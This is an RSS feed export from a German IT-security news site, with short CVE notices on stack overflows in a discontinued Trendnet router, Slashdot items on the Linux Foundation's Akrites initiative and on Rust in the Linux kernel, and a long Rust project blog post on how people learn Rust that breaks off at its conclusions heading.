<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=hacktoberfest+firsttime+maintainer%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 02:22:08 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 02:22:08 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=hacktoberfest+firsttime+maintainer%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=hacktoberfest+firsttime+maintainer%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[CVE-2026-5349 | Trendnet TEW-657BRM 1.00.1 /setup.cgi add_apcdb mac_pc_dba stack-based overflow]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Trendnet TEW-657BRM 1.00.1. The affected element is the function add_apcdb of the file /setup.cgi. The manipulation of the argument mac_pc_dba leads to stack-based buffer overflow. This vulnerability only affects products that are no longer ...]]></description>
<link>https://tsecurity.de/de/3695450/sicherheitsluecken/cve-2026-5349-trendnet-tew-657brm-1001-setupcgi-addapcdb-macpcdba-stack-based-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695450/sicherheitsluecken/cve-2026-5349-trendnet-tew-657brm-1001-setupcgi-addapcdb-macpcdba-stack-based-overflow/</guid>
<pubDate>Sun, 26 Jul 2026 11:51:00 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/trendnet:tew-657brm">Trendnet TEW-657BRM 1.00.1</a>. The affected element is the function <code>add_apcdb</code> of the file <em>/setup.cgi</em>. The manipulation of the argument <em>mac_pc_dba</em> leads to stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-5349">CVE-2026-5349</a>. The attack can be initiated remotely. Additionally, an exploit exists.

The vendor confirms, that "[t]he product in question (...) has been discontinued and end of life since June 23, 2011, that is more than 14 years ago. We no longer provide support for this product, so we are not able to confirm the vulnerabilities. We will make an announcement on our website's product support page and notify customers who registered their products with us."]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-5350 | Trendnet TEW-657BRM 1.00.1 /setup.cgi update_pcdb mac_pc_dba stack-based overflow]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in Trendnet TEW-657BRM 1.00.1. The impacted element is the function update_pcdb of the file /setup.cgi. The manipulation of the argument mac_pc_dba results in stack-based buffer overflow. This vulnerability only affects products that are n...]]></description>
<link>https://tsecurity.de/de/3695446/sicherheitsluecken/cve-2026-5350-trendnet-tew-657brm-1001-setupcgi-updatepcdb-macpcdba-stack-based-overflow/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3695446/sicherheitsluecken/cve-2026-5350-trendnet-tew-657brm-1001-setupcgi-updatepcdb-macpcdba-stack-based-overflow/</guid>
<pubDate>Sun, 26 Jul 2026 11:50:58 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/trendnet:tew-657brm">Trendnet TEW-657BRM 1.00.1</a>. The impacted element is the function <code>update_pcdb</code> of the file <em>/setup.cgi</em>. The manipulation of the argument <em>mac_pc_dba</em> results in stack-based buffer overflow. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-5350">CVE-2026-5350</a>. The attack can be launched remotely. Moreover, an exploit is present.

The vendor confirms, that "[t]he product in question (...) has been discontinued and end of life since June 23, 2011, that is more than 14 years ago. We no longer provide support for this product, so we are not able to confirm the vulnerabilities. We will make an announcement on our website's product support page and notify customers who registered their products with us."]]></content:encoded>
</item>
<item>
<title><![CDATA[1,500 curl authors]]></title>
<description><![CDATA[It takes a village to make curl. A rather big village. I have not been a solo maintainer of curl for a long time and I don’t even do half of the commits anymore Since today, the curl git repository holds the accumulated efforts from 1,500 separate and named individuals. Only 4.5 years since we … ...]]></description>
<link>https://tsecurity.de/de/3694038/tools/1500-curl-authors/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694038/tools/1500-curl-authors/</guid>
<pubDate>Sat, 25 Jul 2026 16:32:52 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It takes a village to make curl. A rather big village. I have not been a solo maintainer of curl for a long time and I don’t even do half of the commits anymore Since today, the curl git repository holds the accumulated efforts from 1,500 separate and named individuals. Only 4.5 years since we … <a href="https://daniel.haxx.se/blog/2026/07/25/1500-curl-authors/" class="more-link">Continue reading <span class="screen-reader-text">1,500 curl authors</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Foundation Launches Akrites To Coordinate AI-Driven Open Source Security]]></title>
<description><![CDATA[BrianFagioli writes: The Linux Foundation has announced Akrites, a new initiative to coordinate vulnerability disclosure and remediation for critical open source software as AI dramatically speeds up vulnerability discovery. Founding members include AWS, Google, Microsoft, OpenAI, Red Hat, NVIDIA...]]></description>
<link>https://tsecurity.de/de/3693462/linux-tipps/linux-foundation-launches-akrites-to-coordinate-ai-driven-open-source-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693462/linux-tipps/linux-foundation-launches-akrites-to-coordinate-ai-driven-open-source-security/</guid>
<pubDate>Sat, 25 Jul 2026 10:12:54 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BrianFagioli writes: The Linux Foundation has announced Akrites, a new initiative to coordinate vulnerability disclosure and remediation for critical open source software as AI dramatically speeds up vulnerability discovery. Founding members include AWS, Google, Microsoft, OpenAI, Red Hat, NVIDIA, IBM, Cisco, JPMorganChase, and others. Akrites will provide a shared Security Incident Response Team (SIRT), a standardized coordinated vulnerability disclosure process, and act as a "maintainer of last resort" for abandoned but widely used packages.
 
The goal is to reduce duplicate reports, avoid conflicting patches, and help upstream maintainers address vulnerabilities before they can be exploited. As AI makes it easier to find security flaws, can a coordinated industry effort help protect open source, or does it risk giving large corporations too much influence over the ecosystem? "Akrites is the largest coordinated effort in history to create systems and deploy tooling that leverages the collective power of the community to make everyone safer," the Linux Foundation said in an open letter. "Akrites participants will contribute engineering resources; work to build and ship fixes; or fund the engineers who do. Some companies have contributed mightily already. The reality is, collectively, we need to contribute more."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Linux+Foundation+Launches+Akrites+To+Coordinate+AI-Driven+Open+Source+Security%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F06%2F25%2F2031228%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F06%2F25%2F2031228%2Flinux-foundation-launches-akrites-to-coordinate-ai-driven-open-source-security%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/06/25/2031228/linux-foundation-launches-akrites-to-coordinate-ai-driven-open-source-security?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rust Will Help Linux Succeed and Makes Coding Fun, Says Greg Kroah-Hartman]]></title>
<description><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust...]]></description>
<link>https://tsecurity.de/de/3693453/linux-tipps/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693453/linux-tipps/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman/</guid>
<pubDate>Sat, 25 Jul 2026 10:12:26 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ZDNet reports on June's Open Source Summit India 2026 in Mumbai, where Linux stable kernel maintainer Greg Kroah-Hartman gave a talk titled "Rust and Linux: How the Rust Language is Going to Help Linux Succeed."




 Kroah-Hartman said in his keynote that "the [Linux] kernel is moving toward Rust. Git is moving toward Rust. Lots of projects are starting to move toward Rust."
 

He didn't always feel that way. Kroah-Hartman added, "A number of years ago, when a friend of mine said, 'Ah, you got to try this new language. It's called Rust.' I was like, 'What? No, C is great.' His friend continued, "'No, no, no! It makes programming fun again.' I'm like, 'Nah, programming is fun in C.' He was right. I should have done it then. Rust is actually fun. It makes programming fun. It takes a lot of stuff away from having to worry about the compiler, which can fix a lot of your problems for you, and it makes code a little bit better." 

So, Kroah-Hartman has moved from being a Rust skeptic to one of its strongest champions inside the kernel. He now regards Rust as a permanent part of Linux, not an experiment. His case is straightforward: Rust's ownership and type system can eliminate most of the "stupid little tiny things" that dominate kernel Common Vulnerabilities and Exposures (CVEs), while making life easier for overworked maintainers. "Rust," in short, "makes my life so much easier...." In India, he said Linux sees "about 13 CVEs a day" and has been running at "almost nine changes an hour" for a decade or more. Most of those vulnerabilities, he argued, are not exotic attacks but simple C mistakes — unchecked pointers, forgotten unlocks, and sloppy cleanup paths: "This is what we're fixing 13 times a day. Small, trivial, little bugs like this all the time.... I've seen every CVE the kernel has done in the past 25 years. I think 80% would be gone, just because they would be caught by Rust." The remaining 20% are the logic bugs he'd prefer to focus on...." 

 Moreover, Rust is becoming the default for new work in key subsystems. "New drivers for some subsystems are only going to be accepted in Rust...." he said. Binder, the Android IPC mechanism at the heart of billions of devices, now has parallel C and Rust implementations in the kernel. The C version "will go away soon," leaving the Rust version "as the bedrock of all Android devices going forward."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Rust+Will+Help+Linux+Succeed+and+Makes+Coding+Fun%2C+Says+Greg+Kroah-Hartman%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F07%2F20%2F0417244%2Frust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/07/20/0417244/rust-will-help-linux-succeed-and-makes-coding-fun-says-greg-kroah-hartman?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Programming Language Blog: The many journeys of learning Rust]]></title>
<description><![CDATA[This is another post in our series covering what we learned through the Vision Doc process. We previously described the overall approach and what we learned about doing user research, we explored what people love about Rust, dug into what it takes to ship safety-crticial Rust, and described some ...]]></description>
<link>https://tsecurity.de/de/3693289/tools/the-rust-programming-language-blog-the-many-journeys-of-learning-rust/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693289/tools/the-rust-programming-language-blog-the-many-journeys-of-learning-rust/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:24 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>This is another post in our series covering what we learned through the Vision Doc process. We previously <a href="https://blog.rust-lang.org/2025/12/03/lessons-learned-from-the-rust-vision-doc-process/" rel="external">described the overall approach and what we learned about doing user research</a>, we <a href="https://blog.rust-lang.org/2025/12/19/what-do-people-love-about-rust/" rel="external">explored what people love about Rust</a>, <a href="https://blog.rust-lang.org/2026/01/14/what-does-it-take-to-ship-rust-in-safety-critical/" rel="external">dug into what it takes to ship safety-crticial Rust</a>, and <a href="https://blog.rust-lang.org/2026/03/20/rust-challenges/" rel="external">described some of the major challenges that people face when using Rust</a>.</em></p>
<p>In this post we walk through what folks have found on their journey to learn the Rust programming language with ups and downs covered.</p>
<p>As a disclaimer, LLMs (Large Language Models) come up in this post because our interviewees brought them up. We're scoping discussion to their use as a learning tool, covering research and example generation, not broader questions about AI (Artificial Intelligence) in software development.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#many-paths-to-needing-rust"></a>
Many paths to needing Rust</h3>
<p>The interviews surfaced several different paths into Rust: curiosity, embedded work, job-market pressure, organizational adoption, and reassignment after a team or company chose Rust. That last path matters because many learners are not evaluating Rust from a blank slate; they are trying to become productive after Rust has already arrived in their work.</p>
<blockquote>
<p>"Funny enough, I've advocated for more niche languages than Rust in the past. Rust has pretty much stopped being as much of a niche language as it was, but it's not Java." -- Fractional CTO</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#rust-learning-resources"></a>
Rust learning resources</h3>
<p>Likely as expected, the folks that we talked to reach for a range of resources to learn Rust. Some reach for official documentation, such as <a href="https://doc.rust-lang.org/book/" rel="external">The Rust Programming Language Book</a> and find that sufficient to build on what the compiler was already showing them.</p>
<blockquote>
<p>"I started with the official Rust documentation because there are a lot of great examples of how features like the borrow checker work." -- Software engineer at an Automotive supplier</p>
</blockquote>
<p>Others needed more passes and more formats, sometimes reaching for resources the community maintains, such as <a href="https://rustlings.rust-lang.org/" rel="external">Rustlings</a>, <a href="https://danielkeep.github.io/tlborm/book/index.html" rel="external">The Little Book of Rust Macros</a>, and <a href="https://rust-unofficial.github.io/too-many-lists/" rel="external">Learn Rust With Entirely Too Many Linked Lists</a>.</p>
<blockquote>
<p>"The first time I went through the chapter in [The Rust Programming Language] on borrow checking, I was like, what is this? I read it again, then I watched a YouTube video of someone explaining the chapter." -- Rust freelance consultant</p>
</blockquote>
<blockquote>
<p>"Rust book, Rustlings, Zero to Production in Rust, Jon Gjengset tutorials. A bunch of books. It's not a one-pass reading. Can't say how many times I've gone through it." -- Software engineer working on video streaming and storage</p>
</blockquote>
<p>These resources have brought up an entire generation of Rust programmers. But, to some, there is a perception that these resources have trouble keeping pace with the language.</p>
<blockquote>
<p>"We'd like to use [The Rust Programming Language/'the book'], but we've found that it's out of date, unfortunately. We've looked at the GitHub repo and found it's got a lot of unresolved issues and unmerged PRs" -- Principal Software Engineering work on Rust adoption in a regulated industry</p>
</blockquote>
<p>Whether or not this is factually true, Rust's growth has nonetheless put more scrutiny on these materials. Companies evaluating adoption and engineers getting reassigned to Rust teams are looking at them with fresh eyes and finding the gaps that affect their own evaluation.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#beginner-stumblings-and-unlearning-habits"></a>
Beginner stumblings and unlearning habits</h3>
<p>It's pretty typical for Rust to be the 2nd, 3rd or Nth programming language that someone picks up. They'd end up writing their most familiar language in Rust, whether C++ patterns, Java patterns, or whatever they knew, for months or even years. Eventually they got comfortable enough to start writing idiomatic Rust.</p>
<blockquote>
<p>"There's a bit of a drop in productivity compared to C if you're already familiar with it just because you're learning new rules, new syntax."  -- Principal Firmware Engineer (mobile robotics)</p>
</blockquote>
<blockquote>
<p>"In the beginning it was more poking around the code and adding and removing some ampersands and asterisks to try to make sense of <code>mut</code> and not <code>mut</code> and whatever." -- Senior engineer with 20 years of Java experience in cloud and IoT</p>
</blockquote>
<p>We also spoke with someone who found that not having much of a programming background seemed to benefit people picking up Rust. Not having worn-in grooves from other languages may play a role here, and it's worth investigating further.</p>
<blockquote>
<p>"I had someone who had never programmed much before start working on the internals of [our Rust project]. She was just fine with getting into Rust. It's more of the senior people that struggle as they need to unlearn practices which may work in other languages, but it's not the 'Rust' way." -- Researcher, Automotive OEM R&amp;D Lab</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-to-work-with-the-borrow-checker"></a>
Learning to work with the borrow checker</h3>
<p>We heard a lot about learning to work with the borrow checker instead of against it. People get there through different paths, but a few patterns came up repeatedly.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#the-compiler-as-teacher"></a>
The compiler as teacher</h4>
<p>Rust's diagnostics did the teaching on their own, especially around lifetimes.</p>
<blockquote>
<p>"If you mess up the lifetimes in a piece of code that you've written by hand, I usually find that Rust's diagnostics are very helpful" -- Researcher working on static analysis of Rust programs</p>
</blockquote>
<blockquote>
<p>"Whatever's missing, the compiler usually fills in: it tells me 'you need to declare the lifetime of this reference', so I know and can figure it out. That all generally works pretty well." -- Senior Software Engineer</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-by-doing"></a>
Learning by doing</h4>
<p>Others felt like they only really internalized the borrow checker after writing a lot of Rust. It took projects, coding challenges, prototyping and so on until at some point it clicked.</p>
<blockquote>
<p>"I actually did not understand the borrow checker until I spent a lot of time writing Rust" -- Founder of a startup built on Rust</p>
</blockquote>
<blockquote>
<p>"Besides the prototyping work, I also did coding-challenge-type stuff to get familiar with Rust for Advent of Code. [..] It eventually clicked to the point where I wasn't fighting with Rust, it was working for me. I had that experience other people describe: when I managed to get my program to fit with Rust, it worked. I didn't spend time debugging." -- Principal Software Engineer, large SaaS provider</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#letting-go-of-clone-guilt"></a>
Letting go of "clone guilt"</h4>
<p>Some learners arrive with the assumption that good Rust means zero clones, zero copies, lifetimes threaded through everything. They set the bar at optimal before they've learned how to write idiomatic Rust, and it makes the borrow checker feel harder than it needs to be at the outset.</p>
<blockquote>
<p>"On one of my first projects, I was like, 'I don't ever want to copy or clone anything,' so I carefully wove through all the lifetimes and got myself into a bit of a bind. Then I saw someone else just cloning the struct I was working with, and it was super cheap. Sometimes you can just clone and it's going to be okay." -- Researcher at a university</p>
</blockquote>
<p>The experienced Rust developers we spoke with consistently said the same thing: clone freely while you're learning, then optimize when you understand the problem. Rust's reputation for performance and correctness feeds this. Newcomers assume anything less than optimal is wrong before they've written a first working program, and clone guilt is how that shows up.</p>
<p>We think it could be an interesting area of future study to check into the patterns Rust programmers employ at different levels of experience and under which circumstances. One member of the Rust Vision doc team that's very experienced with Rust noted that there's kind of an "expected shape" they understand as passing the compiler. This knowledge influences how they approach writing code which wouldn't take that shape and they naturally find themselves understanding when to use so-called workarounds, such as passing around indices into arrays or <code>Vec</code>s.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#multi-paradigm-but-not-the-oop-some-are-used-to"></a>
Multi-paradigm, but not the OOP some are used to</h3>
<p>The Rust programming language is multi-paradigm, and how that lands depends on what you're coming from. We heard some that came from a functional background were delighted with digging into learning how much Rust inherits from that lineage. Some others noted that they and others on their teams struggled to unlearn the object-oriented style they'd come to use heavily in other languages like C++ and Java.</p>
<blockquote>
<p>"Developers coming from C++ tend to think object-oriented. I think that's a difference between C++ and Rust." -- Architect at Automotive OEM</p>
</blockquote>
<blockquote>
<p>"I had exactly that thing, where I would apply all my years of Java and JS thinking, where I could just create some object, not care about it, return it, have it sloshing around between various functions. Found myself reaching for these patterns and then being told 'no, you cannot do that'." -- Principal Engineer at a SaaS company</p>
</blockquote>
<p>Developers coming from functional programming had less to unlearn: strong typing, pattern matching, and an expression-oriented style were already familiar.</p>
<blockquote>
<p>"My background has been more functional programming, strong typing. That originated for me as a Lisper: once a Lisper, always a Lisper." -- Principal Software Engineer working on Rust tooling for safety-regulated industries</p>
</blockquote>
<blockquote>
<p>"The languages I primarily used before Rust were things like OCaml. Way back, I came from C and C++, the classic languages, and then I spent quite a long time doing primarily pure functional stuff. These days I've ended up back in what I like to think of as a pragmatic center ground [with Rust]." -- Fractional CTO</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#teaching-rust-in-academia"></a>
Teaching Rust in academia</h3>
<p>We spoke with a university professor that's been teaching Rust generally. In the academic environment, they were able to use proxies for some things such as "traits are like interfaces in Java" because the students had already gone through a set of courses in their first and second years that taught them Java. They introduced concepts slowly throughout the course, choosing to deal with some more complex topics like generics later. The outcome generally was that students had no problem picking up Rust in this setting.</p>
<blockquote>
<p>"I couldn't see any big difference on the embedded side. We also teach an embedded class, and we did an experiment. Half of the students' feedback was worse on the Rust class, mostly because they needed to build the project themselves. The C students just got one from [an LLM], absolutely no problem." -- University Professor, on teaching Rust</p>
</blockquote>
<p>The C cohort leaned on LLMs for the project in ways the Rust cohort couldn't. We don't yet have a clear answer for why.</p>
<p>What did come through clearly was the Rust cohort's experience with the community. Some students needed to figure out which drivers to use for the embedded project and how to use them. Their professor encouraged them to open issues and ask questions directly on GitHub, and the maintainers responded. Students who had never contributed to open source before were getting answers from the people who wrote the code.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-using-llms"></a>
Learning using LLMs</h3>
<p>Some experienced folks shared that they saw LLMs as a tool that can help someone come up to speed quickly, either as a research tool or for generating example Rust code to understand concepts.</p>
<blockquote>
<p>"I'm optimistic that there's a way to work [LLMs] in that will cut down that learning curve. One of the big things these tools bring is reducing the learning curve in general; these are very good tools to help you navigate a space that you don't know yet." -- Maintainer of large open source Rust crate</p>
</blockquote>
<blockquote>
<p>"I try [LLMs] out once a month, usually for generating an example or something like this. Just like with Stack Overflow: when you read an example, you should read it carefully and try to understand it. Not copy and paste it, but type it in your own words in code and then check it, because that's where the teeny tiny little mistakes are." -- Founder of startup built on Rust</p>
</blockquote>
<p>For some learners, an LLM is just another way to find answers, no different than a search engine.</p>
<blockquote>
<p>"So for the most part, picking up Rust - how do I learn? I'll [use web search for] things, I'll ask [an LLM], I'll just poke around and read the code." -- Senior Software Engineer working in a regulated space</p>
</blockquote>
<p>One founder went further and claimed that LLMs change who can become a Rust developer. One consulting company founder described hiring high school graduates with no systems programming background and training them as Rust developers, with LLMs filling in the learning gaps that would previously have required years of experience.</p>
<blockquote>
<p>"At the beginning, I was worried, but now that we have [LLMs] supporting development, the difficulty of the language doesn't matter. I'm seeing a huge opportunity behind strong runtime languages like Rust. [..] In [Developing Country] we hire 20-25 high school graduates, train them to be Rust programmers, then they enhance our workforce worldwide." -- Founder of a consulting company</p>
</blockquote>
<p>We heard this from one organization. This is a claim that the combination of Rust's compiler and LLM tooling can dramatically shorten the path from beginner to working developer. Whether it generalizes depends on questions we can't answer from a single interview: how long these developers stay, what kind of code they can maintain independently, and whether this training/learning model works outside this company's particular structure. If it holds up, the pool of people who can become Rust developers is much larger than the usual hiring profile suggests.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#organizational-considerations-for-rust-learners"></a>
Organizational considerations for Rust learners</h3>
<p>We spoke with a number of folks on teams that are using Rust in larger organizations. Teams wanted to know that everyone would end up at roughly the same level of competence, which led a good number to invest in training courses to get there. Some leaders found that staff was able to ramp well enough by reading The Rust Programming Language, going through Rustlings, and then picking up lower risk and priority tickets to work on. Having a sense of community was also important within companies; it helps people know they are not alone when they are asked to work on Rust after, say, a reorganization happens.</p>
<blockquote>
<p>"[..] the idea with the class as opposed to 'just read the Rust book on your own' was that this gives everyone kind of the same baseline going in."  -- Principal Firmware Engineer (mobile robotics)</p>
</blockquote>
<blockquote>
<p>"So typically we're going to have people work through Rustlings, work through The Rust Programming Language. We have them then start to pick up lower risk tickets to work on." -- Principal Engineer at a large SaaS provider</p>
</blockquote>
<blockquote>
<p>"We've got an internal Slack channel for Rust learning where people can drop questions and others will come in and answer them. That helps build up understanding and community." -- Software Engineer at a large corporation</p>
</blockquote>
<p>Some organizations found that while the person they'd hire would need to learn Rust, it was still preferable to the alternative of hiring someone for a critical piece of software written in another language.</p>
<blockquote>
<p>"They needed to grow and maintain this C++ codebase. They had a C++ wizard, and they tried for about two years to find someone with the same level of expertise. They ended up hiring people that didn't know Rust and ramping them up, creating FFI bindings from the C++ side so they could work in Rust. And you can feel it: the borrow checker is teaching these people the right way to handle their systems." -- Principal Engineer at an Automotive OEM</p>
</blockquote>
<p>The community and helping each other aspect seems to grow bonds as organizations mature.</p>
<blockquote>
<p>"Our team is [all about] mentorship. I've mentored people coming up to speed on Rust, and people help each other hugely." -- Principal Software Engineer at a large SaaS company</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#silent-attrition"></a>
Silent attrition</h3>
<p>We identified some cases where people have approached Rust and bounced off of it, for one reason or another. In the below case, someone with a background in a language with fewer guardrails found themselves frustrated enough with Rust to walk away.</p>
<blockquote>
<p>"All of that means that that embedded ecosystem is very frustrating to somebody who comes from C and is like, why can't I just get a pointer to this peripheral and then write into the registers. What are you doing to me? [..] My friend never got over that. He looked at it and said, I'm not going to deal with this and walked away." -– A second University Professor</p>
</blockquote>
<p>There may be language features that for a particular domain are not seen as comfortable or usable yet, such as async Rust usage in a safety domain. We'd like to map which language features feel off-limits in which domains; async in safety-critical work probably isn't the only case.</p>
<blockquote>
<p>"We're not fully sure how async [Rust] will work out in the long run in our domain. [..] People don't feel comfortable yet since C++14 doesn't provide such concepts. [..] It's the chicken-and-egg problem again: we probably need to gain some experience to see whether we can actually benefit from these new concepts in the automotive and safety domains." -- Team Lead at Automotive Supplier (ASIL D target)</p>
</blockquote>
<p>We heard in at least one case, that while the language was challenging and there was a near bounce, the tooling helped keep them coming back and trying.</p>
<blockquote>
<p>"Well, I think my early impressions of Rust - one is I find C++ so intimidating, and I think a big part of why I was able to succeed at [..] learning Rust is the tooling. I mean, all this makes sense [..] but it's like, for me, getting started with Rust, the language was challenging, but the tooling was incredibly easy." -- Founder of another startup built on Rust</p>
</blockquote>
<p>While it might be considered more of a community concern, if there are interactions online and in spaces that point to learners having
so-called "skill issues" this feeds into the narrative that Rust must be hard to learn. We may be unintentionally turning away Rust Project contributors and maintainers due to the vibes being put out when new learners show up in certain spaces.</p>
<blockquote>
<p>"People are very helpful, but generally the attitude is: if your program is very complicated, it's mostly a skill issue. There's not that much empathy when people get stuck learning, and a lot of people are just pushed away by it. There's probably a huge number of people who silently stop wanting to write Rust, because at some point it gets complicated and the feedback they get is 'you just need to be a better programmer, obviously'." -- Software Engineer at a SaaS Provider</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#feedback-on-near-bounces-from-survey"></a>
Feedback on near-bounces from survey</h4>
<p>We found a few interesting perspectives collected in the Rust Vision doc survey which we administered with examples of bouncing and coming back:</p>
<blockquote>
<p>"I started before 1.0, got stuck very soon when trying to translate patterns from C++ to Rust (due to borrow checking). I tried again after 1.0 and it stuck. [..]" -- Survey Respondent A</p>
</blockquote>
<p>Survey Respondent A went on to share in a more detailed response about a perceived weakness in Rust learning materials related to lifetimes and the borrow checker are explained. There was an observation that it's fairly easy to run into more complex situations with lifetimes and the borrow checker. They felt that the current state of this sort of material and tutorials is fairly superficial and can leave learners stuck when they run into those more complex situations.</p>
<p>One respondent that bounced once and came back shared challenges around usage of async. In concert with Rust's memory-safety and the borrow checker, they found some of the nitty-gritty details of async were difficult to learn. While we're aware of the Rust Project's continuous efforts to improve Rust's async story, this is another data point of a user that faced challenges.</p>
<p>Another survey respondent shared how they had multiple times bounced in trying to learn Rust. They returned after a year or so and found Rustlings to be highly motivating. We note that having multiple pathways for folks to learn Rust opens up more possibilities for those that nearly bounced, just like this person.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#need-more-focused-work-on-silent-attritrion"></a>
Need more focused work on silent attritrion</h4>
<p>The thing that stood out most to us was the lack of real, first-hand knowledge of having bounced when learning Rust. While this is an obvious effect of soliciting answers to our survey and opportunities to interview through Rust channels and our networks, this cohort is good future candidate where interviews could start.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#conclusions"></a>
Conclusions</h3>
